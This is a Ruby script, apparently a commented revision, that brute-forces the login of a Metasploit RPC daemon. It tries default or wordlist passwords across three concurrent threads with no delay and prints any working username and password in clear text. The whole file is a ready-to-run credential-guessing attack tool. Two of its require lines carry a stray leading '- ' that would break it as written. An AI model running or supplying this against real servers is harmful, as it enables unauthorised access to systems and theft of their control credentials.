#!/usr/bin/env ruby
#
# MSF RPC login brute force
#
- require 'msfrpc-client'
- require 'thread'
# Number of worker threads main starts, i.e. the upper bound on login
# attempts that are in flight at the same time.
MAX_THREADS = 3

puts 'MSF RPC login brute force', '---'

# usage
# Only host and port are enforced here; the user and ssl arguments named in
# the usage line are given defaults further down when they are absent.
unless ARGV.length >= 2
  puts "Usage: ./brute-msfrpcd.rb <host> <port> <user> <ssl> [/path/to/wordlist.txt]"
  exit 1
end
# parse target
# Positional arguments, in order: host, port, user, ssl. Any that is missing
# falls back to the default assigned below.
# NOTE(review): ARGV entries are Strings, so every ssl argument that is
# actually supplied (including the text "false") is truthy and the `true`
# default is only reached when the argument is omitted. How the RPC client
# interprets a String here is not visible in this file; confirm before
# assuming the fourth argument can switch TLS off. The port also stays a String.
@host, @port, @user, @ssl = ARGV.first(4)
@host ||= '127.0.0.1'
@port ||= '55552'
@user ||= 'msf'
@ssl ||= true
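# parse wordlist
# Candidate passwords come from the optional fifth argument, one per line.
# Without it, a short built-in list is used.
file = ARGV[4]
@wordlist = []
if file.nil?
  @wordlist = %w[msf password 1234 12345 msfchangeme abc123 test pass123 myPassword msfpassword]
  puts "* No wordlist specified. Using default list (#{@wordlist.length} words)"
else
  # File.foreach closes the handle itself, even when reading raises.
  # The non-destructive chomp always returns the String, whereas chomp!
  # returns nil for a line with no trailing newline (typically the last line
  # of the file). That nil used to end up in the list, and a nil popped from
  # the queue ends a worker's loop in main early.
  File.foreach(file) { |line| @wordlist << line.chomp }
  puts "* Using wordlist '#{file}' (#{@wordlist.length} words)"
end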
# Feeds every entry of @wordlist through login using MAX_THREADS worker
# threads and returns once all workers have finished.
#
# There is no delay or back-off between attempts: the target sees up to
# MAX_THREADS concurrent login requests for the same user until the list is
# exhausted or one attempt succeeds.
def main
  puts "* Starting MSF RPC login brute force for user '#{@user}'"

  candidates = Queue.new
  @wordlist.each { |word| candidates << word }

  pool = Array.new(MAX_THREADS) do
    Thread.new do
      begin
        loop do
          # Non-blocking pop: raises ThreadError once the queue is empty.
          candidate = candidates.pop(true)
          # A nil/false entry ends this worker, as in a `while` condition.
          break unless candidate
          next unless login(candidate)

          # First success: stop every other live thread. Thread.list is not
          # limited to the workers, so this reaches the main thread as well.
          Thread.list.each do |other|
            other.exit unless other == Thread.current
          end
          break
        end
      rescue ThreadError
        # Queue drained; nothing left for this worker to try.
      end
    end
  end

  pool.each(&:join)
end
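# Makes one RPC login attempt as @user with the given password.
#
# @param pass [String] candidate password
# @return [Boolean] true when the client object comes back holding a token;
#   false on a "Login Failed" response, on any other RPC server error, or
#   when no token was issued
#
# Calls `exit 1` if the connection is refused. On success the user name and
# password are printed to stdout in clear text.
def login(pass)
  puts "* Trying: #{pass}"
  rpc = nil
  begin
    rpc = Msf::RPC::Client.new(:host => @host,
                               :port => @port,
                               :user => @user,
                               :pass => pass,
                               :ssl  => @ssl)
  rescue Rex::ConnectionRefused
    puts '- Error: Connection refused'
    exit 1
  rescue Msf::RPC::ServerException => e
    puts "- Error: connection failed: #{e}" unless e.message =~ /Login Failed/
    # No client object exists on this path. Previously a non-"Login Failed"
    # server error fell through to rpc.token and raised NoMethodError on nil,
    # which the worker threads do not rescue.
    return false
  end
  return false if rpc.token.nil?

  puts "+ Login success: '#{@user}' : '#{pass}'"
  true
ensure
  # Best-effort cleanup; rpc is still nil when the constructor raised.
  begin
    rpc.close if rpc
  rescue StandardError
    nil
  end
end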
# Script entry point: start the attempt loop defined in main.
main